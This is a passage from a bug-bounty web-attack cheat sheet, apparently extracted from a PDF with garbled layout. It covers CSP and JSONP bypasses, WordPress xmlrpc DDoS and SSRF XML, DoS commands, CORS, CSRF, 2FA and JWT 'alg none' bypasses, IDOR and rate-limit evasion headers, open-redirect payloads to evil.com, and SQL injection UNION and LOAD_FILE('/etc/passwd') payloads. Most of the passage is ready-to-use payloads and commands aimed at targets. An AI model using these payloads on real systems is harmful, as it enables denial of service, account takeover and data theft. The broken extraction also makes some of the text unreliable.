Here we have the policy script-src which we know is used to define where we can load javascript files
from. Normally things like would be blocked but due to the value ‘unsafe- inline’ this will execute. This
is something you always want to look out for as it is very handy as an attacker.
You can also see the value data: this will allow you to load javascript if you have the data: element as
shown below: <iframe/src=”data:text/html,”>.
So far all of the techniques used to bypass CSP have been due to some misconfiguration or abusing
legitimate features of CSP. There are also a few other techniques which can be used to bypass the CSP.
JSONP CSP Bypass

If you don’t know what JSONP is you might want to go look at a few tutorials on that topic but ill give
you a brief overview. JSONP is a way to bypass the same object policy (SOP). A JSONP
endpoint lets you insert a javascript payload , normally in a GET parameter called “callback”
and the endpoint will then return your payload back to you with the content type of JSON allowing it to
bypass the SOP. Basically we can use the JSONP endpoint to serve up our javascript payload. You can
find an example below:
https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)
As you can see above we have our alert function being displayed on the page.
The danger comes in when a CSP header has one of these endpoints whitelisted in the script- src policy.
This would mean we could load our malicious javascript via the JSONP endpoint bypassing the CSP
policy.
Look at the following CSP header:
script-src https://www.google.com http://www.google-analytics.com/gtm/js

https://*.gstatic.com/feedback/ https://accounts.google.com;
This would get blocked by the CSP
This would pass because accounts.google.com is allowed to load javascript files. However, we are
abusing the JSONP feature to load our malicious javascript.
?
```something.example.com?vuln_param=https://accounts.google.com/o/oauth2/revoke?callb
ack=alert(1337)
CSP Injection Bypass
The third type of CSP bypass is called CSP injection. This occurs when user supplied input is reflected in
the CSP header. Suppose you have the following url:
-> If your input is reflected in the CSP header you should have somthing like this.
script-src something_vuln_csp; object-src 'none'; base-uri 'none'; require-trusted-types-for 'script';
report-uri https://csp.example.com;
```
This means we can control what value the script-src value is set to. We can easily bypass the CSP by
setting this value to a domain we control.
* CMS
** Wordpress
Wordpress Common Misconfiguration
Here I will try my best to mention all common security misconfigurations for Wordpress I saw before or
officially referenced. I will be attaching all poc and reference as well
Index
Wordpress Detection General
Scan Tool xmlrpc.php
CVE-2018-6389
WP Cornjob DOS
WP User Enumeration
Wordpress Detection
Well, if you are reading this you already know about technology detection tool and methods. Still adding
them below
Wappalyzer
WhatRuns
BuildWith
Geneal Scan Tool

WpScan
xmlrpc.php
This is one of the common issue on wordpress. To get some bucks with this misconfiguration you must
have to exploit it fully, and have to show the impact properly as well.
Detection
visit site.com/xmlrpc.php
Get the error message about POST request only Exploit
Intercept the request and change the method GET to POST
List all Methods
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Check the pingback.ping mentod is there or not Perform
DDOS
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
Perform SSRF (Internal PORT scan only)
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
Tool To Automate XMLRPC-Scan.
?XMLRPC-Scan?
References
?Bug Bounty Cheat Sheet?
?Medium Writeup?
?WpEngine Blog Post?
CVE-2018-6389
This issue can down any Wordpress site under 4.9.3 So while reporting make sure that your target
website is running wordpress under 4.9.3
Detection
Use the URL from my gist called loadsxploit, you will get a massive js data in response.
?loadsxploit?
Exploit
You can use any Dos tool i found Doser really fast and it shut down the webserver within 30 second
?Doser?
python3 doser.py -t 999 -g 'https://site.com/fullUrlFromLoadsxploit' References

?H1 Report?
?CVE Details?
?Blog Post?
WP Cornjob DOS
This is another area where you can perform a DOS attack.
Detection
visit site.com/wp-cron.php
You will see a Blank page with 200 HTTP status code Exploit
You can use the same tool Doser for exploiting this
python3 doser.py -t 999 -g 'https://site.com/wp-cron.php' Reference

?GitHub Issue?
?Medium Writeup? WP
User Enumeration
This issue will only acceptable when target website is hiding their current users or they are not
publically available. So attacker can use those user data for bruteforcing and other staff
Detection
visit site.com/wp-json/wp/v2/users/
You will see json data with user info in response Exploit
If you have xmlrpc.php and this User enumeration both presence there. Then you can chain them out by
collecting username from wp-json and perform Bruteforce on them via xmlrpc.php. It will surely show
some extra effort and increase the impact as well
Reference
?H1 Report?
Researcher Note
Please do not depend on those issues at all. I saw people only looking for those issues and nothing else.
Those are good to have a look while testing for other vulnerabilities and most of the time they work good
for chaining with other low bugs.
* CORS
** Misconfigured CORS
Here are few methods and steps you can do to check for misconfigure cors. Hunting
method 1(Single target):
Step->1. Capture the target website and spider or crawl all the website using burp.
Step->2. Use burp search look for Access-Control
Step->3. Try to add Origin Header i.e,Origin:attacker.com or Origin:null or

Origin:attacker.target.com or Origin:target.attacker.com
Step->4 If origin is reflected in response means the target is vuln to CORS

Hunting method 2(mutliple means including subdomains):
step 1-> find domains i.e subfinder -d target.com -o domains.txt step 2->
check alive ones : cat domains.txt | httpx | tee -a alive.txt
step 3-> send each alive domain into burp i.e, cat alive.txt | parallel -j 10 curl --proxy "http://127.0.0.1:8080" -sk
2>/dev/null
step 4-> Repeat hunting method 1
Both above method are manual methods so lets check an automated way Tools
https://github.com/chenjj/CORScanner
https://github.com/lc/theftfuzzer
https://github.com/s0md3v/Corsy
https://github.com/Shivangx01b/CorsMe
Automate Way :
step1-> find domains i.e, subfinder -d domain.com -o target.txt
step2-> grep alive: cat target.txt | httpx | tee -a alive.txt
step3-> grep all urls using waybackurls by @tomnomnom and gau tool i.e,cat alive.txt | gau | tee -a
urls.txt
step4-> run any of these tools on each url
step5-> configure the manually
Another Method
Tools You Will Need for this method.
https://github.com/tomnomnom/meg https://github.com/tomnomnom/gf
https://github.com/projectdiscovery/subfinder
https://github.com/tomnomnom/assetfinder
https://github.com/Edu4rdSHL/findomain
https://github.com/projectdiscovery/httpx
Steps
1) Find Domains with the help of subfinder,assetfinder,findomain i.e , subfinder -d target.com

| tee -a hosts1 , findomain -t target.com | tee -a hosts1 , assetfinder --subs-only target.com
|tee -a hosts1 .
2) Then cat hosts1 | sort -u | tee -a hosts2 and then cat hosts2 | httpx | tee -a hosts .
3) Navigate through terminal where hosts file is located echo "/" > paths
4) Then type meg -v
5) After the completion of process type gf cors.
6) All the urls with Access-Control-Allow will be

displayed. Authors
** CORS Bypasses
- Origin:null
- Origin:attacker.com
- Origin:attacker.target.com
- Origin:attackertarget.com
- Origin:sub.attackertarget.com
- Origin:attacker.com and then change the method Get to post/Post to Get
- Origin:sub.attacker target.com
- Origin:sub.attacker%target.com
- Origin:attacker.com/target.com
* CSRF
6 CSRF Bypass by Hack3rSr0lls

CSRF Mindmap Source
https://twitter.com/hackerscrolls/status/1265217322308046849
** CSRF Bypass
Cross Site Request Forgery(CSRF)
Hello Guys, I Tried My Best To Share all The CSRF Bypasses I Know. I Hope This Will Help You.
Csrf will be login, logout, resetpass, change password, add-cart, like, comment, profie change, user
details change, blance transffer, subscription ect
-Change Request Method [POST => GET]

?
-Remove Total Token Parameter

?
-Remove The Token, And Give a Blank Parameter

?
-Copy a Unused Valid Token , By Dropping The Request and Use That Token
?
-Use Own CSRF Token To Feed it to Victim
?
-Replace Value With Of A Token of Same Length

?
-Reverse Engineer The Token

?
-Extract Token via HTML injection

?
-Switch From Non-Form `Content-Type: application/json` or `Content-Type: application/x-urlencoded`

To `Content-Type: form-multipart`
?
-Change/delete the last or frist character from the token

?
-Change referrer to Referrer

?
-Bypass the regex

If the site is looking for “bank.com” in the referer URL, maybe “bank.com.attacker.com” or
“attacker.com/bank.com” will work.
?
-Remove the referer header (add this <meta name=”referrer” content=”no-referrer”> in your payload
or html code)
?
-Clickjacking
?(If you aren’t familiar with clickjacking attacks, more information can be found
https://owasp.org/www-community/attacks/Clickjacking.)
Exploiting clickjacking on the same endpoint bypasses all CSRF protection. Because technically, the
request is indeed originating from the legitimate site. If the page where the vulnerable endpoint is
located on is vulnerable to clickjacking, all CSRF protection will be rendered irrelevant and you will be
able to achieve the same results as a CSRF attack on the endpoint, albeit with a bit more effort.
* FINDING CVES
** CVES
Tools
- Google
- Twitter
- N
uclei
Steps:
1. Grab all the subdomains i.e, subfinder -d domain.com | tee -a domains.txt

2. Grap all alive domains i.e, cat domains.txt | httpx -status-code | grep 200 | cut -d " " -f1 | tee
-a alive.txt
3. Run nuclei basic-detection,panels,workflows,cves templates differently and store results in
different file. i.e, cat alive.txt | nuclei -t nuclei-templates/workflows | tee -a workflows.
4. Read each output carefully with
patience. 5.Find interest tech used by target. i.e,
jira
6.put that link into browser check the version used by target. 7.Go on
google search with jira version exploit.
8. grep the cves
9. Go to twitter in explore tab search CVE(that you found from google) poc or CVE exploit 10.Go
to google and put cve or some details grab from twitter for a better poc read writeups
related to that.
11.Try all cves if success report it.:)
* FILE UPLOAD BYPASS

Suppose you have a limitation that you can only upload in a few formats like PDF, JPEG, JPG,
….But what if you can upload a PHP file by defying the Upload mechnism and validation of file type
check. let me tell you if someone can upload a PHP file then its game over for the website as he will
upload a php shell and can easily perform an RCE , or Worst will simply gain a reverse shell on the
server.
How does Bypass work
Well it depends on which kind of validation the system is using …it is just verfying the extension ?? if its
just doing that then it becomes very easy to bypass and upload a PHP file or something malicious.
suppose we have to upload a JPG file so the extension must be something.jpg
1. Bypassing Normal extension

Now what we can do is we can upload a file which looks like this something.php.jpg or
somethings.jpg.php.
2. Bypassing the magic Byte validation.

For this method we use polygots. Polyglots, in a security context, are files that are a valid form of
multiple different file types. For example, a GIFAR is both a GIF and a RAR file. There are also files out
there that can be both GIF and JS, both PPT and JS, etc.
so while we have to upload a JPEG file type we actaully can upload a PHAR-JPEG file which will
appear to be a JPEg file type to the server while validating. the reason is the file PHAR- JPEg file has
both the JPEG header and the PHP file also. so while uploading it didn’t get detected and later after
processing the PHP file can be used to exploit.
And at last Uploading a shell to some random websites for fun is not really cool so don’t ever try untill
unless you have the permission to test.
How the bypass was possible?
1.Create a malicious file with an extension that is accepted by the application. 2.Upload that
file and click on send.
3. Capture the request in any proxy tool, edit the file extension to the malicious extension that you
want. In some cases, you might need to change the content type of a file.
4. Forward the request to the server.
* Find
Origin Identifying a
WAF
1.dig +short example.com

2.curl -s https://ipinfo.io/IP | jq -r '.org'
- With AWS, you can often identify a load balancer with the presence of "AWSLB" and
"AWSLBCORS" cookies
Identifying the source
- Use https://dnsdumpster.com to generate a map.
- Next, make a search using Censys and save the IP's that look to match your target in a text file.
Example: https://censys.io/ipv4?q=0x00sec.org?
- Another way you can find IP's tied to a domain is by viewing their historical
IPs. You can do this with SecurityTrails DNS trails.
https://securitytrails.com/domain/0x00sec.org/dns?
-- Here we can see what A records existed and for how long. It is so common for an administrator to
switch to a WAF solution after X amount of years of using it bare-metal, and do you think they configure
whitelisting? No of course not, it works fine!
-- you can just copy the entire table(Select full table and copy paste it in a txt file) body and use awk to
filter the IP's out.
grep -E -o "([0-9]{1,3}[\\.]){3}[0-9]{1,3}" tails.txt | sort -u | tee -a ips.txt DNS
Enumeration
1.If you enumerate your targets DNS, you may find that they have something resembling a
dev.example.com or staging.example.com subdomain, and it may be pointing to the source host with no
WAF.
?
2.- Get all the subdomains.

3. `subfinder -silent -d 0x00sec.org | dnsprobe -silent | awk '{ print $2 }' | sort -u | tee -a
ips.txt`
Checking IP's for hosts
1.for ip in $(cat ips.txt) # iterate through each line in file 2.do

3. org=$(curl -s <https://ipinfo.io/$ip> | jq -r '.org') # Get Org from IPInfo
4. title=$(timeout 2 curl -s -k -H "Host: 0x00sec.org" <https://$ip/> | pup 'title text{}') # Get title
5. echo "IP: $ip Title: $title Org: $org" # Print results
6.done
in one line, same command:

for ip in $(cat ips.txt); do org=$(curl -s <https://ipinfo.io/$ip> | jq -r '.org'); title=$(timeout 2 curl
--tlsv1.1 -s -k -H "Host: 0x00sec.org" <https://$ip/> | pup 'title text{}'); echo "IP: $ip Title: $title Org:
$org"; done
- What we have now is a quick overview of which IP's respond to which Host header, and we can
view the title
- We went through each host, requested the IP directly with the host header, and we have our
source IP!
Setting the Host Header manually curl -s -k -H "Host: 0x00sec.org" https://<ip address>/ or set
Host Header in burp.
CloudFail
1.git clone <https://github.com/m0rtem/CloudFail.git> 2.cd

CloudFail
3.pip install -r requirements.txt 4.python3
cloudfail.py -t 0x00sec.org But first, Recon!
- The idea is to start your normal recon process and grab as many IP addresses as you can (host,
nslookup, whois, ranges…), then check which of those servers have a web server enabled (netcat,
nmap, masscan).
- Once you have a list of web server IP, the next step is to check if the protected domain is
configured on one of them as a virtual host.
Censys
- Choose “Certificates” in the select input, provide the domain of your target, then hit \
- You should see a list of certificates that fit to your target
- Click on every result to display the details and, in the “Explore” menu at the very right, choose
“IPv4 Hosts”.
- You should be able to see the IP addresses of the servers that use the certificate
- From here, grab all IP you can and, back to the previous chapter, try to access your target
through all of them.
example:
curl -s -k -H "Host: 0x00sec.org" https://<ip address>/ Mail
headers
- The next step is to retrieve the headers in the mails issued by your target: Subscribe the
newsletter, create an account, use the function “forgotten password”, order something… in a nutshell do
whatever you can to get an email from the website you’re testing
- Once you get an email, check the source, and especially the headers. Record all IPs you can
find there, as well as subdomains, that could possibly belong to a hosting service. And again, try to
access your target through all of them.
The value of header Return-Path worked pretty well
Tool: https://github.com/christophetd/CloudFlair This tools works on censys data.
References: https://delta.navisec.io/a-pentesters-guide-part-5-unmasking-wafs-and-finding- the-source/

https://blog.detectify.com/2019/07/31/bypassing-cloudflare-waf-with-the-origin- server-ip-address/
* HTTP_DESYNC_ATTACK
- Basics:
"HTTP request smuggling is a technique for interfering with the way a web site processes sequences of
HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often
critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive
data, and directly compromise other application users. " -Portswigger
Where ?:
- Any Endpoint might be Vulnerable to HTTP Desync attack.
- You can Find the Vulnerability on Non-endpoints as well, But impact is always much higher on
Sensitive Endpoints ;)
Step 1:
- Go To Repeater tab, and try various Timing based payloads to confirm the bug. More
Explaination here:
?Finding the Vulnerability?
Step 2:
- Once you have successfully discovored the bug, you can chain it with various bugs eg. Account
Takeover by stealing session IDs, Cross side Scripting Attacks in User-Agent
Header,etc. More Description here:
?Exploiting the Vulnerability?
Tools:
?1.defparam`s_smuggler.py
Usage:
- Smuggler.py :
cat alive_urls.txt | python3 smuggler.py -m GET/POST #either GET or POST OR
python3 smuggler.py -u https://example.com -m GET/POST
?- Burp_smuggler (also available in BApp store)
* HOST HEADER ATTACK
Check This Things While Testing 1.

Add two HOST: in Request.
2.Try this Headers
X-Original-Url:
X-Forwarded-Server:
X-Host:
X-Forwarded-**Host**:
X-Rewrite-Url:
3.If you come accross /api.json in any AEM instance during bug hunting, try for web cache poisoning
via following
Host: , X-Forwarded-Server , X-Forwarded-Host:

and or simply try https://localhost/api.json HTTP/1.1 4.Also
try Host: redacted.com.evil.com
5. Try Host: evil.com/redacted.com

6. Try this too Host: example.com?.mavenlink.com
7. Try Host: javascript:alert(1); Xss payload might result in debugging mode.

https://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html
8. Host Header to Sqli
https://blog.usejournal.com/bugbounty-database-hacked-of-indias-popular-sports-company-
bypassing-host-header-to-sql-7b9af997c610
9. Bypass front server restrictions and access to forbidden files and directories through X-
Rewrite-Url/X-original-url:
curl -i -s -k -X 'GET' -H 'Host: <site>' -H 'X-rewrite-url: admin/login' 'https://<site>/'.
* HTML-Injec
tion Summary
Password reset links are usually addressed to your account name followed by the reset link. Also if the
application allows you to have your account name with tags and special characters then you should try
this.
Steps
1) Create your account 2) Edit your name to <h1>attacker</h1> or "abc><h1>attacker</h1> and

save it. 3) Request for a reset password and check your email. 4) You will notice the <h1> tag getting
executed
- HTML injection are usually considered as low to medium severity bugs but you can escalate the
severity by serving a malicious link by using <a href> for eg: <h1>attacker</h1><a
href="your-controlled-domain"Click here</a>
- You can redirect the user to your malicious domain and serve a fake reset password page to
steal credentials Also you can serve a previously found XSS page and steal user cookies etc etc.. The
creativity lies on you..
* IDOR
Testing for IDOR/Broken object level authorization:
Difficulty: Easy
Tips: Don't blindly test for changing numbers till you get PII, tools can do this for you Finding
IDOR Attack Vectors Ideas:
1. What do they use for authorization?(JWT, API Keys, cookies, tokens) Tip: Find this out by
replacing high privaledge authorization with lower privaledge authorization and seeing what the server
responds with
2. Understand how they use ID's, hashes, and their API. Do this by looking at the API
Documentations if they have one.
Every time you see a new API endpoint that receives an object ID from the client, ask yourself the
following questions:
- Does the ID belong to a privateresource? (e.g

/api/user/123/news vs
/api/user/123/transaction)
- What are the IDs that belong to me?
- What are the different possible roles in the API?(For example — user, driver, supervisor,
manager)
Bypassing Object Level Authorization:

- Add parameters onto the endpoints for example, if there was
GET /api_v1/messages --> 401
vs
GET /api_v1/messages?user_id=victim_uuid --> 200
- HTTP Parameter pollution
GET /api_v1/messages?user_id=VICTIM_ID --> 401 Unauthorized

GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID --> 200 OK
?
GET /api_v1/messages?user_id=YOUR_USER_ID[]&user_id=ANOTHER_USERS_ID[]
- Add .json to the endpoint, if it is built in Ruby!
/user_data/2341 --> 401 Unauthorized

/user_data/2341.json --> 200 OK
- Test on outdated API Versions
/v3/users_data/1234 --> 403 Forbidden

/v1/users_data/1234 --> 200 OK
- Wrap the ID with an array.
{“id”:111} --> 401 Unauthriozied

{“id”:[111]} --> 200 OK
- Wrap the ID with a JSON object:
{“id”:111} --> 401 Unauthriozied

?
{“id”:{“id”:111}} --> 200 OK
- JSON Parameter Pollution:
POST /api/get_profile
Content-Type: application/json
{“user_id”:<legit_id>,”user_id”:<victim’s_id>}
- Try to send a wildcard(*) instead of an ID. It’s rare, but sometimes it works.
- If it is a number id, be sure to test through a large amount of numbers, instead of just guessing
- If endpoint has a name like /api/users/myinfo, check for /api/admins/myinfo
- Replace request method with GET/POST/PUT
- Use burp extension autorize
- If none of these work, get creative and ask
around! Escalating/Chaining with IDOR's Ideas:
1. Lets say you find a low impact IDOR, like changing someone elses name, chain that with XSS
and you have stored XSS!
2. If you find IDOR on and endpoint, but it requires UUID, chain with info disclosure endpoints
that leak UUID, and bypass this!
3. If none of these work, get creative and ask
around! Reference
?https://twitter.com/swaysThinking/status/1301663848223715328
* JWT Attack
FIRST IF YOU DON'T KNOW WHAT IS JWT YOU MUST READ AND WATCH BELOW
RESOURCES
https://twitter.com/BHinfoSecurity/status/1299743624553549825?s=09 https://youtu.be/ghfmx4pr1Qg (
very begginer friendly)
https://medium.com/ag-grid/a-plain-english-introduction-to-json-web-tokens-jwt-what-it-is-
and-what-it-isnt-8076ca679843
https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a Cheat Sheet
- Pentester's Lab
NOTES FOR ATTACKING JWT
What the heck is this ?!
```
It is an authentication type
It consists of header,payload,Signature
```
Header
"alg" : "HS256",
"typ" : "JWT"
Payload
"loggedInAs" : "admin",
"iat" : 1422779638
Signature
HMAC-SHA256 (
secret,
base64urlEncoding(header) + '.' +
base64urlEncoding(payload)
Changing alg to null
Example
"alg" : "NONE",
"typ" : "JWT"
Note;;////--remove the signuature
You can also use none,nOne,None,n0Ne
Change the payload like
``` Payload
{"loggedInAs":"admin","iat":1422779638}
* Here change user to admin
# SOME MORE TIPS AND METHOD
1. First decode full token or 1 1 each part of token to base64
2. Change the payload use jwt web token burp
3. Changing encrption rs256 to sh256
4. Signature not changes remove it or temper it,
5. Brute forcing the key in hs256 because it use same key to sign and verify means
publickey=private key
### Other Easy Method
1) Create a account
2) Inspect the token
3) Base64 decode the header
4) If any Kid= parameter are there so you can find some bugs
5) Using that parameter you can also find directory traversal , i tell you how
6) Change that kid= parameter with you directory traversal payload
7) Change payload {"user":"admin"}
8) Create a python script that generate a exploit token. (If you want that script so dm me in Twitter
)
9) Put that token and reload the page
10) Done
```
TOOLS TO USE
- Jwt token attack burp extention
(Link - https://github.com/portswigger/json-web-token-attacker)
- Base64 decoder
- jwt.io to analyse the struct of token
- jwt cat for weak secret token
(Link: https://github.com/aress31/jwtcat) (Link :
https://github.com/ticarpi/jwt_tool.git)
-- Tool to test security of JSON Web Tokens jwtXploiter
SOURCES:
Youtube,Medium,Github,Google
* MFA Bypasses
2FA Bypass by Hack3rScr0lls

** 2FA-Bypass
- Reset Password function
- Rate limit
- Sending all alphabets instead of number
- 2FA bypass by substituting part of the request from the session of another account.
1. If a parameter with a specific value is sent to verify the code in the request, try sending the
value from the request of another account.
?
2. For example, when sending an OTP code, the form ID/user ID or cookie is checked, which is
associated with sending the code. If we apply the data from the parameters of the account on which you
want to bypass code verification (Account 1) to a session of a completely different account (Account 2),
receive the code and enter it on the second account, then we can bypass the protection on the first
account. After reloading the page, 2FA should disappear.
-- Bypass 2FA using the “memorization” functionality.
Many sites that support 2FA, have a “remember me” functionality. It is useful when the user doesn’t
want to enter a 2FA code on subsequent login windows. And it is important to identify the way in which
2FA is “remembered”. This can be a cookie, a value in session/local storage, or simply attaching 2FA to
an IP address.
-- Information Disclousre(otp leak in response)
-- Bypassing 2fa Via OAuth mechanism ( Mostly not Applicable one )
Site.com requests Facebook for OAuth token > Facebook verifies user account > Facebook send
callback code > Site.com logs a user in (Rare case)
-- Bypassing 2fa using response manipulation
Enter correct OTP -> Intercept & capture the response -> logout -> enter wrong OTP -> Intercept &
change the response with successful previous response -> logged in
-- Bypassing 2fa via CSRF attack on disable 2FA
Signup for two account -> Login into attacker account & capture the disable 2FA request -> generate
CSRF POC with .HTML extension -> Login into victim account and fire the request —
— -> It disable 2FA which leads to 2FA Bypass.
* MISCONFIGURATIONS
** Default Credentials Basics

Default Software Configurations for admin console of webapp
https://www.target.com/admin
https://www.target.com/admin-console
https://www.target.com/console
https://admin.target.com
https://admin-console.target.com https://console.target.com
Getting access through third party services
When the admin console login page is working on a third party service,then just search for it's default
credentials on Google
Third Party service URL are of the format: https://target..com/login Some
examples are Okta,WP etc
Bypass to get access to login page

This bypass is used when you are forbidden to get access to admin login page We use
Header Injection for this bypass
X-Orginal-URL: /admin or X-Rewrite-URL:/admin
Use this Header under Host
Use Burp to capture then check
Hackerone Reports :
?https://hackerone.com/reports/192074?
?https://hackerone.com/reports/174883?
?https://hackerone.com/reports/398797? Source :
?https://www.owasp.org/index.php/Testing_for_default_credentials_(OTG-AUTHN-002)
https://www.owasp.org/index.php/Testing_for_Default_or_Guessable_User_Account_(OWAS
P-AT-003)
* OAuth
* OPEN REDIRECT
** Find OpenRedirect Trick
"I apply this everytime while testing web applications and found many Open Redirects and even an XSS
using this trick!"
Steps:
1. If the Applictaion have a user Sign-In/Sign-Up feature, then register a user and log in as the
user.
2. Go to your user profile page , for example : samplesite.me/accounts/profile
3.Copy the profile page's URL
4.Logout and Clear all the cookies and go to the homepage of the site. 5.Paste
the Copied Profile URL on the address bar
6. If the site prompts for a login , check the address bar , you may find the login page with a
redirect parameter like the following
?- https://samplesite.me/login?next=accounts/profile?
?- https://samplesite.me/login?retUrl=accounts/profile?
7. Try to exploit the parameter by adding an external domain and load the crafted URL eg:-
https://samplesite.me/login?next=https://evil.com/ (or)
https://samplesite.me/login?next=https://samplesite.me@evil.com/ #(to beat the bad regex filter)
8. If it redirects to evil.com , thers's your open redirection bug.
9. Try to leverage it to XSS eg:- https://samplesite.me/login?next=javascript:alert(1);//
** Open Redirection Bypass
This bypass I found in a application while I doing pentesting. I hope it will helps you too!
1. While you I trying to redirect https://targetweb.com?url=http://attackersite.com it did not

redirected!
2. I Created a new subdomain with with www.targetweb.com.attackersite.com
3. And when I tried to redirect with

https://targetweb.com?url=www.targetweb.com.attackersite.com?
4. It will successfully redirected to the www.targetweb.com.attackersite.com website!
5.Due to the bad regex it has been successfully bypass their protection!
* PARAMETER POLLUTION
** Parameter Pollution In Social Sharing Buttons

Hi Guys, Though it is not severe bug.But still some organizations take this seriously. Steps :
1. Browse through your
target. say https://target.com
2. Find a article or blog present on target website which must have a link to share that blog on
different social networks such as
Facebook,Twitter etc.
3. Let's say we got and article with url:
https://taget.com/how-to-hunt
then just appened it with payload
?&u=https://attacker.com/vaya&text=another_site:https://attacker.com/vaya so our url
will become
https://taget.com/how-to-
hunt?&u=https://attacker.com/vaya&text=another_site:https://attacker.com/vaya 4.Now
hit enter with the abover url and just click on share with social media.
Just observe the content if it is including our payload i.e. https://attacker.com Then it is
vulnerable or else try next target.
References:
?- https://hackerone.com/reports/105953?
- Google
* PASSWORD RESET FUNCTIONALITY
** PASSWORD RESET MINDMAP

** Password Reset Token Leakage Password
Reset Token Leakage
Steps:
1.Sent a password reset request using forget password
2.Check your email
3. copy your reset page link and paste in another tab and make burp intercept on.
4. Look for every request if you find similiar token that is in reset link with other domain like:
bat.bing.com or facebook.com
5. Than there is reset password token leakage.
** Account_Takeover_By_Password_Reset_Functionality
1. email= victim@gmail.com&email=attacker@gmil.com
2. email= victim@gmail.com%20email=attacker@gmil.com
3. email= victim@gmail.com |email=attacker@gmil.com
4. email= victim@gmail.com%0d%0acc:attacker@gmil.com
5. email= victim@gmail.com&code= my password reset token
* RATE LIMIT
** Rate Limit Bypass Techniques
There are two ways to do that
- Customizing HTTP Methods
- Adding Headers to Spoof IP
1. Customizing HTTP Methods

- If the request goes on GET try to change it to POST, PUT, etc.,
- If you wanna bypass the rate-limit in API's try HEAD
method. Rate Limit Bypass using Header
Use the following Header just Below the Host Header
X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
#or use double X-Forwarded-For header
X-Forwarded-For:
X-Forwarded-For: IP
Adding HTTP Headers to Spoof IP and Evade Detection

- These are Headers I've collected so far to Bypass
Rate-Limits. X-Forwarded: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Forward-For: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Rate Limit Bypass using Special Characters
- Adding Null Byte ( %00 ) at the end of the Email can sometimes Bypass Rate Limit.
- Try adding a Space Character after a Email. ( Not Encoded )
- Some Common Characters that help bypassing Rate Limit : %0d , %2e , %09 , %20 , %0, %00,
%0d%0a, %0a, %0C
- Adding a slash(/) at the end of api endpoint can also Bypass Rate Limit. domain.com/v1/login
-> domain.com/v1/login/
Using IP Rotate Burp Extension
- Try changing the user-agent, the cookies... anything that could be able to identify you
- If they are limiting to 10 tries per IP, every 10 tries change the IP inside the header.
Change other headers
- Burp Suite's Extension IP Rotate works well in many cases. Make sure you have Jython
installed along.
- Here You'll everything you need - https://github.com/PortSwigger/ip-rotate
You can find some more here - Check this out
You can find more with screenshot
https://medium.com/@huzaifa_tahir/methods-to-bypass-rate-limit-5185e6c67ecd Reference
https://twitter.com/m4ll0k2/status/1294983599943540738/photo/1
https://twitter.com/SalahHasoneh1/status/1287366496432332800
https://twitter.com/SMHTahsin33/status/1295054667613757441(all in one must check)
* SQL Injection
Here are some quick methods to detect the SQL Injection vulnerability, though the methods are not
limited. There are various tricks and tools.
Methods To Find Sqli
1. Using Burpsuite :
1. Capture the request using burpsuite.
2. Send the request to burp scanner.
3. Proceed with active scan.
4. Once the scan is finished, look for SQL vulnerability that has been detected.
5. Manually try SQL injection payloads.
6. Use SQLMAP to speed up the process.
2. Using waybackurls and other bunch of tools :
1. sublist3r -d target | tee -a domains (you can use other tools like findomain, assetfinder, etc.)
2. cat domains | httpx | tee -a alive
3. cat alive | waybackurls | tee -a urls
4. gf sqli urls >> sqli
5. sqlmap -m sqli --dbs --batch
6. use tamper scripts
- More Details in this source thread

https://twitter.com/El3ctr0Byt3s/status/1302706241240731649
3. Using heuristic scan to get hidden parameters :
1. Use subdomain enumeration tools on the domain.
2. Gather all urls using hakcrawler, waybackurls, gau for the domain and subdomains.
3. You can use the same method described above in 2nd point.
4. Use Arjun to scan for the hidden params in the urls.
5. Use --urls flag to include all urls.
6. Check the params as https://domain.com?<hiddenparam>=<value>
7. Send request to file and process it through sqlmap.
4. Error generation with untrusted input or special characters :
1. Submit single quote character ' & look for errors.
2. Submit SQL specific query.

3. Submit Boolean conditions such as or 1=1 and or 1=0, and looking application's response.
4. Submit certain payloads that results in time delay.
Post-Methods
1. Finding total number of columns with order by or group by or having :
Submit a series of ORDER BY clause such as
' ORDER BY 1 --
' ORDER BY 2 -- '
ORDER BY 3 --
and incrementing specified column index until an error occurs.
2. Finding vulnerable columns with union operator :
Submit a series of UNION SELECT payloads.
' UNION SELECT NULL --
' UNION SELECT NULL, NULL --
' UNION SELECT NULL, NULL, NULL --
(Using NULL maximizes the probability that the payload will succeed. NULL can be converted to every
commonly used data type.)
- To go for the methods in more detail, go through portswigger site.
https://portswigger.net/web-security/sql-injection/union-attacks
3. Extracting basic information like database(), version(), user(), UUID() with concat() or
group_concat()
1. Database version
Oracle SELECT banner FROM v$version

SELECT version FROM v$instance
Microsoft SELECT @@version
PostgreSQL SELECT version()

MySQL SELECT @@version
2. Database contents
Oracle SELECT * FROM all_tables

SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
Microsoft SELECT * FROM information_schema.tables

SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQL SELECT * FROM information_schema.tables

MySQL SELECT * FROM information_schema.tables

3. Shows version, user and database name
' AND 1=2 UNION ALL SELECT concat_ws(0x3a,version(),user(),database())
4. Using group_concat() function, used to concat all the rows of the returned results.
' union all select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where

table_schema=database()–
4. Accessing system files with load_file(). and advance exploitation afterwards : '
UNION ALL SELECT LOAD_FILE ('/ etc / passwd')
5. Bypassing WAF :
